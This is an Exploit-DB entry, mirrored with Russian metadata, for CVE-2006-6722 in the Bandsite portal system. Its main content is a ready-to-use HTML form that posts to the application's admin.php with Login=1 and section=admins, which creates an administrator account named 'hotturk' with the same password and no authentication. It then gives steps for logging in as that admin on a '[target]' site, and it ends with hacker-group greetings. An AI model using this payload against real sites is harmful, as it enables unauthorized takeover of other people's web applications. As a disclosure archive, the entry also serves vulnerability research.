- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2938
- Проверка EDB
-
- Пройдено
- Автор
- H0TTURK-
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6722
- Дата публикации
- 2006-12-16
HTML:
<!--
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author : H0tTurk-
WebSiteVersion:1.x
- Problem : Admin Added Access.
Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
-->
<TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
<TBODY>
<tr><td bgcolor=#ffffff>
</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1§ion=admins method=post>
Name:<br>
<input type=text name='name' value='hotturk' size="20"><br>
Pass:<br>
<input type=text name='pass' value='hotturk' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
<!--
Admin Added :)
http://[target]/bandwebsite/login.php
and login as admin
name :hotturk
pass : hotturk
--------------------------------------------------------
Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,KurtEfendy,MadConfig,R4zor,Arabian-FighterZ,And Ayyildiz ViP Soldiers
"BUNDAN OTESÝ YA ÝSTÝKLAL YA OLUM"
-->
# milw0rm.com [2006-12-16]- Источник
- www.exploit-db.com
